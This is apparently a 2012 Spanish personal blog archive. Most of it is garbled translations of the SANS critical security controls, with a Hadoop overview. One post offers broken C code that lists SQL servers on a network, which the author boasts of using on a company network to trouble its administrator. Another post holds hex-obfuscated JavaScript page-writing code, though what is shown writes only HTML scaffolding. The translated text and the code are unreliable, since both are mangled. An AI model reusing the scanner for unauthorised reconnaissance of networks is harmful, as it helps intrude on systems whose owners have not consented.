Associated NIST Special Publication 800-53, Revisión 3, Prioridad 1 Controles

CM-1, CM-2 (1, 2), CM-3 (b, c, d, e, 2, 3), CM-5 (2), CM-6 (1, 2, 4), CM- 7 (1), SA-1 (a), SA-4 (5), SI-7 (3), PM-6
Asociadas NSA manejables Hitos Red Plan y tareas de seguridad de red

Hito 7: Gestión de Base

Configuración y Gestión del Cambio
Procedimientos y herramientas para implementar y automatizar este control

Las organizaciones pueden implementar este control mediante el desarrollo de una serie de imágenes y servidores de almacenamiento seguro para la celebración de estas imágenes estándar. Herramientas de configuración comerciales y / o de gestión libre puede ser empleado para medir la configuración del sistema operativo y las aplicaciones de las máquinas administradas a tener en cuenta las desviaciones de las configuraciones de imagen estándar utilizados por la organización. Algunas de las herramientas de gestión de configuración requieren que un agente esté instalado en cada sistema administrado, mientras que otros remotamente iniciar sesión en cada equipo gestionado con credenciales de administrador. Cualquiera de los enfoques o combinaciones de los dos enfoques pueden proporcionar la información necesaria para este control.
Control 3 Metric:

El sistema debe ser capaz de identificar cualquier cambio a una imagen oficial endurecida que puede incluir modificaciones en los archivos clave, servicios, puertos, archivos de configuración o de cualquier software instalado en el sistema. Las modificaciones incluyen la eliminación, cambios o adiciones de software nuevo a cualquier parte de los sistemas operativos, servicios o aplicaciones que se ejecutan en el sistema. La configuración de cada sistema debe cotejarse con la base de datos master imagen oficial para verificar los cambios para asegurar configuraciones que podrían afectar la seguridad. Cualquiera de estos cambios en un sistema informático debe ser detectada dentro de 24 horas y la notificación realizada por el envío de aviso o notificación por correo electrónico a una lista de personal administrativo de la empresa. Los sistemas deben bloquear la instalación, prevenir la ejecución o software no autorizado cuarentena dentro de una hora adicional, aviso o enviar e-mail cuando esta acción se ha producido. Cada 24 horas después de ese punto, el sistema debe alertar o enviar e-mail sobre el estado del sistema hasta que el sistema no autorizada ha sido retirado de la red o remediadas. Si bien los plazos de 24 horas y una hora-representan la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en las futuras organizaciones deben esforzarse aún más para alertar rápido y aislamiento.
Control 3 de la prueba:

Para evaluar la aplicación de control 3 en forma periódica, un equipo de evaluación debe mover un sistema de prueba benigna que no contiene la imagen endurecido oficial, pero que contiene servicios adicionales, los puertos, y los cambios de los archivos de configuración en la red. Esto debe llevarse a cabo en 10 diferentes segmentos aleatorios usando cualquiera de los sistemas reales o virtuales. El equipo de evaluación debe verificar que los sistemas de generar una alerta en relación con los cambios en el software dentro de las 24 horas. Es importante que el equipo de evaluación verificar que todos los cambios no autorizados se han detectado. El equipo también debe verificar que la alerta o el correo electrónico que se recibe en una hora adicional que indica que el software ha sido bloqueado o puesto en cuarentena. El equipo de evaluación debe verificar que el sistema proporciona información sobre la ubicación de cada máquina con los cambios no autorizados, incluida la información sobre el propietario de los activos.

El equipo de evaluación debe verificar que el software se bloquea al intentar ejecutarlo y comprobar que no se le permite correr. Además de estas pruebas, dos pruebas adicionales deben ser realizadas:


1. Herramientas de comprobación de la integridad del archivo se debe ejecutar en una base regular. Cualquier cambio en el sistema operativo crítico, servicios y archivos de configuración debe ser confirmada en cada hora. Cualquier cambio debe ser bloqueado y seguir el proceso de notificación anterior.

2. Sistema de herramientas de análisis que comprueban la versión del software, los niveles de parches y archivos de configuración se debe ejecutar en una base diaria. Cualquier cambio debe ser bloqueado y seguir el e-mail proceso de notificación.
Control 3 Entidad Sistema Diagrama de relaciones (ERD):

Organizaciones encontrará que la diagramación de las entidades necesarias para cumplir plenamente los objetivos definidos en este control, será más fácil identificar la forma de aplicar el, probar los controles, e identificar dónde los posibles fallos en el sistema pueden ocurrir. Al igual que con cualquier configuración, todos los cambios deben ser aprobados y administrados por un proceso de control de cambios.

Un sistema de control es un dispositivo o conjunto de dispositivos para la gestión, mando, dirigir o regular el comportamiento de otros dispositivos o sistemas. En este caso, estamos examinando los dispositivos, software y entidades utilizadas para gestionar y aplicar una configuración coherente de configuración para estaciones de trabajo, portátiles y servidores de la red. Vamos a discutir otros dispositivos de red más adelante en el curso. La siguiente lista de los pasos en el diagrama de arriba muestra cómo las entidades trabajan juntos para alcanzar el objetivo de negocio definida en este control. La lista también ayuda a identificar cada paso con el fin de identificar los puntos potenciales de fallo en el control general.



Paso 1: imágenes con garantía del sistema se aplican a los sistemas informáticos

Paso 2: las imágenes garantizados almacenados del sistema de una manera segura

Paso 3: Sistema de Gestión de la configuración valida y verifica imágenes del sistema

Paso 4: Configuración del sistema de aplicación de políticas explora activamente los sistemas de producción de errores de configuración o desviaciones de las líneas de base

Paso 5: sistemas de evaluación de la integridad de archivos binarios controlar críticos del sistema y conjuntos de datos

Paso 6: Blanco listado monitores de herramientas configuraciones de sistemas y software

Paso 7: Escáner SCAP configuración valida las configuraciones

Paso 8: la integridad del sistema de archivos evaluación envía desviaciones sistema de alerta

Paso 9: Herramienta establecimiento White envía a desviaciones sistema de alerta

Paso 10: Escáner SCAP configuración envía desviaciones sistema de alerta

Paso 11 y 12: Gestión de documentos informes de estado de configuración

Fuente:http://www.sans.org/critical-security-controls/control.php?id=3

Traduccion:Dellcom1@.

Saludos Mundo Libre.

sábado, 10 de noviembre de 2012

Hadoop

Saludos Mundo Libre.

¿Qué es Apache Hadoop?

El Apache Hadoop ™ ® proyecto desarrolla software de código abierto para la fiabilidad, la computación escalable y distribuido.

El Apache Hadoop biblioteca de software es un marco que permite el procesamiento distribuido de grandes conjuntos de datos a través de grupos de ordenadores que utilizan modelos sencillos de programación. Está diseñado para pasar de los servidores individuales a miles de máquinas, cada oferta local de computación y almacenamiento. En lugar de confiar en el hardware para ofrecer alta avaiability, la propia biblioteca está diseñada para detectar y controlar los errores en la capa de aplicación, por lo que la entrega de un servicio altamente availabile en la parte superior de un grupo de computadoras, cada una de las cuales puede ser propenso a errores.

El proyecto incluye los siguientes módulos:

    Común Hadoop: Las utilidades comunes que soportan los otros módulos de Hadoop.
    Hadoop Distributed File System (HDFS ™): Un sistema de archivos distribuido que proporciona un alto rendimiento de acceso a datos de aplicaciones.
    HILADOS Hadoop: Un marco para la planificación de tareas y gestión de recursos de clúster.
    Hadoop MapReduce: Un sistema basado en HILADOS para el procesamiento paralelo de grandes conjuntos de datos.

Otros proyectos relacionados con Hadoop de Apache son:

    Avro ™: Un sistema de serialización de datos.
    Cassandra ™: Un escalable multi-master de base de datos sin puntos únicos de falla.
    Chukwa ™: Un sistema de recolección de datos para la gestión de grandes sistemas distribuidos.
    HBase ™: Una base de datos escalable y distribuida que soporta el almacenamiento de datos estructurados para tablas grandes.
    Hive ™: Una infraestructura de almacenamiento de datos que proporciona el resumen de datos y consultas ad hoc.
    Mahout ™: una máquina de aprendizaje escalable y biblioteca minería de datos.
    Pig ™: Un alto nivel de flujo de datos lenguaje y un marco de ejecución de cómputo paralelo.
    ZooKeeper ™: Un servicio de coordinación de alto rendimiento para aplicaciones distribuidas.

Introducción

Para empezar, comience aquí:

    Aprenda sobre Hadoop mediante la lectura de la documentación.
    Descarga desde la página de Hadoop liberación.
    Discuta Hadoop en la lista de correo.

Descargar Hadoop

Por favor, visita la página lanzamientos para descargar una versión de Apache Hadoop.
¿Quién utiliza Hadoop?

Una amplia gama de empresas y organizaciones utilizan Hadoop para la investigación y la producción. Los usuarios están invitados a sumarse a la página de Hadoop PoweredBy wiki.




Para aquellos que quieren conocer un poco sobre las entranas de como funciona Facebook.

Fuente:http://hadoop.apache.org/#What+Is+Apache+Hadoop%3F

Traduccion:Dellcom1@.

viernes, 9 de noviembre de 2012

20 vulnerabilidades criticas 2.0

Saludos Mundo libre.

He aqui la siguiente traduccion de las 20 vulnerabilidades criticas.

Inventario de Software autorizado y no autorizado

¿Cómo atacantes aprovechan de la ausencia de este control?

Atacantes informáticos implementar sistemas que continuamente exploran espacios de direcciones de organizaciones objetivo en busca de versiones vulnerables de software que puede ser explotado remotamente. Algunos atacantes también distribuir las páginas hostiles web, archivos de documentos, archivos multimedia y otros contenidos a través de sus propias páginas web o sitios de terceros por lo demás dignos de confianza. Cuando las víctimas inocentes acceder a este contenido con un navegador vulnerable o en otro programa del lado del cliente, los atacantes comprometer sus máquinas, a menudo la instalación de programas de puerta trasera y robots que dan al atacante control a largo plazo del sistema. Algunos atacantes sofisticados pueden utilizar ataques de día cero, que se aprovechan de las vulnerabilidades previamente desconocidas para la que aún no hay parche sido dadas a conocer por el proveedor de software. Sin el conocimiento adecuado o control del software implementado en una organización, los defensores no pueden asegurar adecuadamente sus activos.

Sin la capacidad de inventario y control de los programas que se instalan y se permite que se ejecuten en sus máquinas, las empresas hacen sus sistemas más vulnerables. Tales máquinas mal controlados tienen más probabilidades de ser software en ejecución que es innecesario para fines comerciales, la introducción de posibles fallos de seguridad, o ejecutando software malicioso introducido por un atacante equipo después de un sistema se ve comprometida. Una vez que una sola máquina ha sido explotado, los atacantes a menudo lo utilizan como un punto de parada para recoger información sensible del sistema comprometido y de otros sistemas conectados a él. Además, las máquinas comprometidas se utilizan como punto de partida para el movimiento a lo largo de la red y redes asociadas. De esta forma, los atacantes rápidamente puede convertir una máquina comprometida en muchos. Las organizaciones que no cuentan con inventarios completos de software no puede encontrar los sistemas que ejecutan software malintencionado o vulnerable para mitigar los problemas de raíz o por los atacantes.
Cómo implementar, automatizar y medir la efectividad de este control

1. Ganancias rápidas: Elaborar una lista de software autorizado que se requiere en la empresa para cada tipo de sistema, incluyendo servidores, estaciones de trabajo y ordenadores portátiles de diversos tipos y usos. Esta lista debe estar ligada a presentar software de comprobación de integridad para validar que el software no se puede modificar.

2. Ganancias rápidas: Realizar análisis regular y generar alertas cuando se instala software no autorizado en una computadora. Un proceso de cambio estricto control también deben ser implementados para controlar cualquier cambio o instalación de software para todos los sistemas de la red.

3. Visibilidad / Reconocimiento: La tecnología de implementación de aplicaciones listas blancas que permite que los sistemas para ejecutar el software sólo está aprobado e impide la ejecución de cualquier otro software en el sistema.

4. Visibilidad / Reconocimiento: Implementar herramientas de inventario de software en toda la organización, con cada uno de los tipos de sistemas operativos en uso, incluyendo servidores, estaciones de trabajo y ordenadores portátiles. El sistema de inventario de software debe realizar un seguimiento de la versión del sistema operativo subyacente, así como las aplicaciones instaladas en él. Además, la herramienta debe registrar no sólo el tipo de software instalado en cada sistema, sino también su número de versión y el nivel de revisión. El inventario de software debe estar vinculado a los informes vulnerabilidad / amenaza servicios de inteligencia para arreglar el software vulnerable de forma proactiva.

5. Visibilidad / Reconocimiento: Los sistemas de inventario de software debe ser atado en el inventario de activos de hardware para todos los dispositivos y el software asociado están controlados desde un solo lugar.

6. Configuración / Higiene: La herramienta de inventario de software también debe controlar el software no autorizado instalado en cada máquina. Este software no autorizado también incluye software legítimo administración del sistema instalado en los sistemas no apropiado donde no hay necesidad comercial de la misma. Tipos de archivo peligrosos (por ejemplo, exe, zip, msi, etc) deben ser estrechamente monitoreados y / o bloqueadas.

7. Configuración / Higiene: El inventario de software y la lista blanca de aplicaciones también deben desplegarse en todos los dispositivos móviles que se utilizan en toda la organización.

8. Avanzado: Las máquinas virtuales y / o sistemas de aire con huecos también deben utilizarse para aislar y ejecutar aplicaciones que se requieren, pero sobre la base de más alto riesgo y que no se debe instalar en un entorno de red.

9. Advanced: Configuración de estaciones de trabajo no permanentes con entornos operativos virtualizados que pueden ser rápida y fácilmente restaurados a una instantánea de confianza sobre una base periódica.

10. Avanzado: Implementar software que sólo proporciona firmados etiquetas de identificación de software. Una etiqueta de identificación del software es un archivo XML que se instala junto con el software y el software identifica de forma exclusiva, proporcionando datos para el inventario de software y gestión de activos.
Associated NIST Special Publication 800-53, Revisión 3, Prioridad 1 Controles

CM-1, CM-2 (2, 4, 5), CM-3, CM-5 (2, 7), CM-7 (1, 2), CM-8 (1, 2, 3, 4, 6 ), CM-9, PM-6, SA-6, SA-7
Asociadas NSA manejables Hitos Red Plan y tareas de seguridad de red

Hito 7: Gestión de Base

Restricciones de contenido ejecutables
Procedimientos y herramientas para implementar y automatizar este control

El sistema debe ser capaz de identificar software no autorizado, ya sea mediante la detección de un intento de instalarlo o ejecutarlo, notificando a la empresa personal administrativo dentro de las 24 horas a través de una alerta o por correo electrónico. Los sistemas deben bloquear la instalación, prevenir la ejecución o software no autorizado cuarentena dentro de una hora adicional, aviso o enviar e-mail cuando esta acción se ha producido. Cada 24 horas después de ese punto, el sistema debe alertar o enviar e-mail sobre el estado del sistema hasta que el sistema no autorizada ha sido retirado de la red. Si bien los plazos de 24 horas y una hora-representan la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en las futuras organizaciones deben esforzarse aún más para alertar rápido y aislamiento.

Control 2 Metric:
El sistema debe ser capaz de identificar software no autorizado mediante la detección de un intento de instalar o ejecutarlo, notificando a la empresa personal administrativo dentro de las 24 horas a través de una alerta o por correo electrónico. Los sistemas deben bloquear la instalación, prevenir la ejecución o software no autorizado cuarentena dentro de una hora adicional, aviso o enviar e-mail cuando esta acción se ha producido. Cada 24 horas después de ese punto, el sistema debe alertar o enviar e-mail sobre el estado del sistema hasta que haya sido eliminado de la red. Si bien los plazos de 24 horas y una hora-representan la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en las futuras organizaciones deben esforzarse aún más rápido para alertar y aislamiento, con notificación sobre el software no autorizado enviado a los dos minutos y el aislamiento dentro de los cinco minutos.

Control 2 Test:

Organizaciones encontrará que la diagramación de las entidades necesarias para cumplir plenamente los objetivos definidos en este control, será más fácil identificar la manera de implementar, probar los controles, e identificar dónde los posibles fallos en el sistema pueden ocurrir.

Un sistema de control es un dispositivo o conjunto de dispositivos para la gestión, mando, dirigir o regular el comportamiento de otros dispositivos o sistemas. En este caso, estamos examinando el software instalado en los sistemas de red de la organización. Estos sistemas deben ser capaces de identificar si el software nuevo es introducido en el medio ambiente que no ha sido autorizado por personal de la empresa. La siguiente lista de los pasos en el diagrama de arriba muestra cómo las entidades trabajan juntos para alcanzar el objetivo de negocio definida en este control. La lista también ayuda a identificar qué cada uno de los pasos del proceso con el fin de ayudar a identificar los puntos potenciales de fallo en el control general.




Paso 1: Escáner Dispositivo activo

Paso 2: Active Reports escáner a la base de datos de inventario

Paso 3: Base de datos de inventario se compara con un inventario de línea base

Paso 4: Base de datos de inventario se inicia el sistema de alerta

Paso 5: Sistema de Alerta de seguridad notifica a los defensores de los

Paso 6: Monitor de seguridad y los defensores de la base de datos de inventario seguro.

Paso 7: Seguridad de los defensores de actualizaciones de software de base de datos de inventario

Paso 8: herramienta establecimiento White seguimiento continuo de todos los sistemas en la red

Paso 9: Lista Blanca revisa y hace cambios a la base de datos de inventario de software

He aqui la segunda entrega que la disfruten

Fuente:http://www.sans.org/critical-security-controls/control.php?id=2

Traduccion:Dellcom1@.

Saludos Mundo Libre.

jueves, 8 de noviembre de 2012

20 vulnerabilidades criticas articulo 1.0

Saludos Mundo Libre.

En diferentes articulos les expongo las 20 Vulnerabilidades criticas.

Inventario de dispositivos autorizados y no autorizados

¿Cómo atacantes aprovechan de la ausencia de este control?
Muchos grupos criminales y los estados nación de implementar sistemas que continuamente exploran espacios de direcciones de organizaciones objetivo, a la espera de nuevos sistemas y desprotegidos que deben adjuntarse a la red. Los atacantes también buscan computadoras portátiles no están actualizadas con los parches, ya que no son frecuentemente conectados a la red. Un ataque común se aprovecha de un nuevo hardware que está instalado en la noche una red y no configurado y parcheado con las actualizaciones de seguridad apropiadas hasta el día siguiente. Los atacantes desde cualquier parte del mundo puede rápidamente encontrar y explotar estos sistemas que son accesibles a través de Internet. Además, incluso para los sistemas de la red interna, los atacantes que ya han tenido acceso interno puede cazar y comprometer otros sistemas internos indebidamente aseguradas informáticos. Algunos atacantes utilizar la ventana de la noche local para instalar puertas traseras en los sistemas antes de que se endurezca.
Apts (amenaza persistente avanzada) diana usuarios internos con el objetivo de poner en peligro un sistema en la red privada que puede ser utilizado como un punto de giro para atacar los sistemas internos. Incluso los sistemas que están conectados a la red privada, sin visibilidad de la Internet, todavía puede ser un objetivo del adversario avanzada. Cualquier sistema, incluso los sistemas de ensayo que están conectados por un corto período de tiempo, todavía se puede utilizar como un punto de relevo para causar daño a una organización.
Las nuevas tecnologías sigue saliendo, BYOD (traiga su propio dispositivo) - donde los empleados traer dispositivos personales en el trabajo y su conexión a la red - se está volviendo muy común. Estos dispositivos ya podría ser comprometido y se usa para infectar los recursos internos.Cómo implementar, automatizar y medir la efectividad de este control
1. Victorias rápidas: Implementar un inventario automatizado de activos herramienta de descubrimiento y utilizarlo para construir un inventario de activos preliminar de los sistemas conectados a la red pública y privada de una organización (s). Ambas herramientas activas que exploran a través de los rangos de direcciones de red y herramientas pasivas que identifican a los hosts basados ​​en el análisis de su tráfico debe ser empleado.
2. Victorias rápidas: Implementar servidor de registro de DHCP y utilizar un sistema para mejorar el inventario de activos y ayudar a detectar sistemas desconocidos a través de esta información DHCP.
3. Ganancias rápidas: Todas las adquisiciones de equipo debe actualizar automáticamente el sistema de inventario como nuevo, dispositivos aprobados están conectados a la red. Un proceso de cambio de control robusto también se puede usar para validar y aprobar todos los nuevos dispositivos.
4. Visibilidad / Reconocimiento: Mantener un inventario de los activos de todos los sistemas conectados a la red y los dispositivos de red propios, registrando por lo menos las direcciones de red, el nombre de máquina (s), el propósito de cada sistema, un propietario activo responsable de cada dispositivo, y el departamento asociado con cada dispositivo. El inventario debe incluir todos los sistemas que tiene un protocolo de Internet (IP) de la red, incluyendo pero no limitado a ordenadores de sobremesa, portátiles, servidores, equipos de red (routers, switches, firewalls, etc), impresoras, redes de área de almacenamiento, Voz sobre IP, teléfonos multi-homed direcciones, direcciones virtuales, etc El inventario de activos creados también debe incluir datos acerca de si el dispositivo es un dispositivo portátil y / o personales. Los dispositivos tales como teléfonos móviles, tablets, portátiles y otros dispositivos electrónicos portátiles que almacenan datos o proceso debe ser identificado, independientemente de si están o no están conectados a la red de la organización.
5. Configuración / higiene: Asegúrese de que la base de datos de inventario de activos están debidamente protegidos y una copia almacenada en un lugar seguro.
6. Configuración / Higiene: Además de un inventario de hardware, las organizaciones deben desarrollar un inventario de los activos de información que identifica a su información crítica y los mapas de información crítica para los activos de hardware (incluidos los servidores, estaciones de trabajo y ordenadores portátiles) en el que se ubica. Un departamento y persona responsable de cada activo de información deben ser identificados, registrados y rastreados.
7. Configuración / Higiene: Implementar la autenticación de red 802.1x nivel a través de limitar y controlar los dispositivos que se pueden conectar a la red. 802.1x debe estar vinculada a los datos de inventario para determinar autorizadas frente a los sistemas no autorizados.
8. Configuración / Higiene: implementar el control de acceso de red (NAC) para supervisar sistemas autorizados por lo que si los ataques ocurren, el impacto puede ser remediada por el traslado del sistema que no se confía a una red de área local virtual que tiene un acceso mínimo.
9. Configuración / Higiene: Crear las VLAN separadas para BYOD (traiga su propio dispositivo) sistemas u otros dispositivos no fiables.
10. Avanzado: Utilice certificados de cliente para validar y autenticar los sistemas antes de conectarse a la red privada.Associated NIST Special Publication 800-53, Revisión 3, Prioridad 1 Controles
CM-8 (a, c, d, 2, 3, 4), PM-5, PM-6Asociadas NSA manejables Hitos Red Plan y tareas de seguridad de red
Hito 2: Mapa de la Red
Hito 3: Arquitectura de red
Network Access Protection / Control (NAP / NAC)Procedimientos y herramientas para implementar y automatizar este control
Las organizaciones deben primero establecer dueños de la información y los propietarios de los activos, decidir y documentar que las organizaciones y los individuos son responsables de cada componente de información y cada dispositivo. Algunas organizaciones mantienen inventarios de activos específicos que utilizan a gran escala productos para empresas comerciales dedicadas a la tarea, o utilizan soluciones libres para seguir y luego barrer la red periódicamente para nuevos activos conectados a la red. En particular, cuando las organizaciones eficaces de adquirir nuevos sistemas, graban el propietario y las características de cada activo nuevo, incluyendo su interfaz de red de Media Access Control (MAC), un identificador único codificado en la mayoría de las tarjetas de interfaz de red y dispositivos. Este mapeo de atributos de los activos y la dirección de propietario-a-MAC se pueden almacenar en un sistema de gestión de base libre o comercial.
Luego, con el inventario de activos montados, muchas organizaciones utilizan herramientas para extraer información a partir de los activos de red como switches y routers con respecto a las máquinas conectadas a la red. Usando autenticar de manera segura y cifrada protocolos de gestión de red, herramientas pueden recuperar direcciones MAC y otra información de dispositivos de red que pueden conciliarse con el inventario de activos de la organización de servidores, estaciones de trabajo, computadoras portátiles y otros dispositivos. Una vez que las direcciones MAC se confirman, los interruptores deben implementar 802.1x para permitir que sólo los sistemas autorizados para conectarse a la red.
Yendo más lejos, organizaciones eficaces configurar las herramientas de la red comercial o libre de exploración para realizar barridos de red sobre una base regular, como por ejemplo cada 12 horas, el envío de una variedad de diferentes tipos de paquetes para identificar los dispositivos conectados a la red. Antes de escanear tal puede tener lugar, las organizaciones deben comprobar que tienen ancho de banda adecuado para tales exploraciones periódicas de historial de carga de consultoría y capacidades de sus redes. En la realización de las exploraciones de inventario, herramientas de escaneo puede enviar paquetes tradicionales de ping (ICMP Echo Request), en busca de las respuestas de ping para identificar un sistema en una dirección IP determinada. Debido a que algunos sistemas de bloquear paquetes entrantes ping, además de pings tradicionales, los escáneres también puede identificar los dispositivos de la red mediante el protocolo de control de transmisión (TCP) sincronización (SYN) o reconocer (ACK) paquetes. Una vez que hayan identificado las direcciones IP de los dispositivos de la red, algunos escáneres ofrecen sólidas funciones de huellas para determinar el tipo de sistema operativo de la máquina descubierto.
Además de las herramientas de escaneo activas que barren la red, otras herramientas de identificación de activos escuchar pasivamente en las interfaces de red en busca de dispositivos para anunciar su presencia mediante el envío de tráfico. Tales herramientas pasivas pueden ser conectados para cambiar puertos span en lugares críticos de la red para ver todos los datos que fluyen a través de tales interruptores, la maximización de la posibilidad de identificar sistemas que se comunican a través de los interruptores.
Los dispositivos inalámbricos y computadoras portátiles (con cable) en forma periódica pueden unirse a una red y luego desaparecen, haciendo el inventario de los sistemas disponibles en la actualidad churn significativamente. Del mismo modo, las máquinas virtuales pueden ser difíciles de rastrear en los inventarios de activos cuando se apaga o en pausa, porque no son más que archivos del sistema de archivo de una máquina anfitrión. Además, las máquinas remotos que acceden a la red mediante una red privada virtual (VPN) puede aparecer en la red durante un tiempo y, a continuación se desconecta de ella. Ya sean físicos o virtuales, cada máquina conectada directamente a la red o conectado a través de VPN, funcionando actualmente o cerrar, deben ser incluidos en el inventario de activos de una organización.Control 1 Metric:
El sistema debe ser capaz de identificar nuevos dispositivos no autorizados que están conectados a la red dentro de las 24 horas, y de alertar o el envío de notificación por correo electrónico a una lista de empresas personal administrativo. Automáticamente, el sistema debe aislar el sistema no autorizado de la red dentro de la hora de la alerta inicial y enviar una alerta de seguimiento o notificación por correo electrónico cuando el aislamiento se logra. Cada 24 horas después de ese punto, el sistema debe alertar o enviar e-mail sobre el estado del sistema hasta que el sistema no autorizada ha sido retirado de la red. La base de datos de inventario de activos y sistema de alerta que debe ser capaz de identificar la ubicación, el departamento y otros detalles de donde los dispositivos autorizados y no autorizados están conectados a la red. Si bien los plazos de 24 horas y una hora-representan la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en las futuras organizaciones deben esforzarse aún más para alertar rápido y aislamiento. Con herramientas automatizadas, notificación sobre un activo no autorizado conectado a la red puede ser enviado a los dos minutos y el aislamiento conseguidos en cinco minutos.Controlar Prueba 1:
Para evaluar la aplicación de control 1 en forma periódica, el equipo de evaluación conectar sistemas endurecidos pruebas a por lo menos 10 lugares en la red, incluyendo una selección de subredes asociadas a las zonas desmilitarizadas (DMZ), estaciones de trabajo y servidores. Dos de los sistemas deben ser incluidos en la base de datos de inventario de activos, mientras que los otros sistemas no son. El equipo de evaluación debe verificar que los sistemas de generar un aviso de alerta por correo electrónico o en relación con los sistemas nuevos que se conectan dentro de las 24 horas de las máquinas de prueba están conectados a la red. El equipo de evaluación debe verificar que el sistema proporciona los detalles de la ubicación de todas las máquinas de prueba conectados a la red. Para las máquinas de prueba incluidos en el inventario de activos, el equipo también debe verificar que el sistema proporciona información sobre el propietario de los activos.
El equipo de evaluación debe verificar que los sistemas de prueba son automáticamente aislado de la red de producción dentro de la hora de la notificación inicial y que un correo electrónico o una alerta que indica el aislamiento se ha producido. Posteriormente, el equipo debe verificar que los sistemas de prueba conectados están aislados de los sistemas de producción, tratando de hacer ping y utilizar otros protocolos para acceder a los sistemas de la red de producción y comprobar que la conectividad no está permitido.Control 1 Entidad Sistema Diagrama de relaciones (ERD):
Organizaciones encontrará que la diagramación de las entidades necesarias para cumplir plenamente los objetivos definidos en este control, será más fácil identificar la manera de implementar, probar los controles, e identificar dónde los posibles fallos en el sistema pueden ocurrir.








Un sistema de control es un dispositivo o conjunto de dispositivos se utilizan para administrar, comando, dirigir o regular el comportamiento de otros dispositivos o sistemas. En este caso, estamos examinando los dispositivos de hardware en la red de la organización. Estos sistemas deben ser capaces de identificar si se introducen nuevos sistemas para el medio ambiente que no han sido autorizados por el personal de la empresa. La siguiente lista de los pasos en el diagrama de arriba muestra cómo las entidades trabajan juntos para alcanzar el objetivo de negocio definida en este control. La lista también ayuda a identificar cada uno de los pasos del proceso con el fin de ayudar a identificar los posibles puntos de fallo en el control general.
Paso 1: Escáner Dispositivo activo analiza los sistemas de red
Paso 2: Escáner Dispositivo pasivo capta la información del sistema
Paso 3: Active Reports escáner a la base de datos de inventario
Paso 4: Informes pasivos del escáner a la base de datos de inventario
Paso 5: Base de datos de inventario almacenada fuera de línea
Paso 6: Base de datos de inventario se inicia el sistema de alerta
Paso 7: Sistema de Alerta de seguridad notifica a los defensores de los
Paso 8: Monitor de seguridad y los defensores de la base de datos de inventario seguro
Paso 9: Actualizaciones de seguridad de los defensores de la base de datos de inventario seguro
Paso 10: El control de acceso a redes (NAC) monitoriza continuamente la red
Paso 11: Red de control de control de acceso y proporciona actualizaciones de la base de datos de inventario de activos.


Hay se los dejo segire traduciendo el resto para ustedes.

Fuente:http://www.sans.org/critical-security-controls/

Traduccion:Dellcom1@.

Saludos Mundo Libre.

lunes, 5 de noviembre de 2012

scan SQL

Saludos Mundo Libre.

He aqui un pequeno codigo que alguna ocacion me a servido para la red que tire en una empresa y puso al administrador en un problema hay se los dejo usen su imajinacion para crear o agregar mas cosas.

Lo que ase este codigo es buscar los servidores SQL dentro de la red en la que es lanzado si encuentra un servidor sql te lo indica sino lanza un error.

#include  stdio.h
#include  netcons.h
#include  server.h

struct server_info_1 svr [100];

main ()
{

int i;
int fet;
unsigned short entriestread;
unsigned short totalentries;

ret = NetServerEnum (NULL,1, (char *)svr, sizeof (svr), &entriestread, &totalentries);

if (!ret)

}

printf ("\nEl Siguiente SQL Server Fue Encontrado ");
printf (" La Network\n ");
printf (" El Nombre Del Servidor\n ");
printf ("   --------------------------------------------------\n ");

for (i=0; i < entriestread; i++)

if (svr[i].sv1_type & SV_TYPE_SQLSERVER)

printf (" %-20s %s\n" , svr[i].sv1_name,svr[i].sv1_commet);

}

else

{

printf ("Error al llamar NetServerEnum,");
printf ("error valor = %d\n", ret);

}

}

Espero que les sirva como ami en muchas ocaciones.

Saludos Mundo Libre.

viernes, 2 de noviembre de 2012

Camino ala difurcacion

Saludos Mundo Libre.

Me he encontrado con este articulo :

Camino ala difurcacion.

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x21\x44\x4f\x43\x54\x59\x50\x45 \x68\x74\x6d\x6c \x50\x55\x42\x4c\x49\x43 \"\x2d\/\/\x57\x33\x43\/\/\x44\x54\x44 \x58\x48\x54\x4d\x4c \x31\x2e\x30 \x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x61\x6c\/\/\x45\x4e\" \"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\/\x54\x52\/\x78\x68\x74\x6d\x6c\x31\/\x44\x54\x44\/\x78\x68\x74\x6d\x6c\x31\x2d\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x61\x6c\x2e\x64\x74\x64\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x68\x74\x6d\x6c \x78\x6d\x6c\x6e\x73\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\/\x31\x39\x39\x39\/\x78\x68\x74\x6d\x6c\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x68\x65\x61\x64\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x6d\x65\x74\x61 \x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76\x3d\"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\" \x63\x6f\x6e\x74\x65\x6e\x74\x3d\"\x74\x65\x78\x74\/\x68\x74\x6d\x6c\x3b \x63\x68\x61\x72\x73\x65\x74\x3d\x67\x62\x32\x33\x31\x32\" \/\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\/\x68\x65\x61\x64\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x62\x6f\x64\x79\x3e");
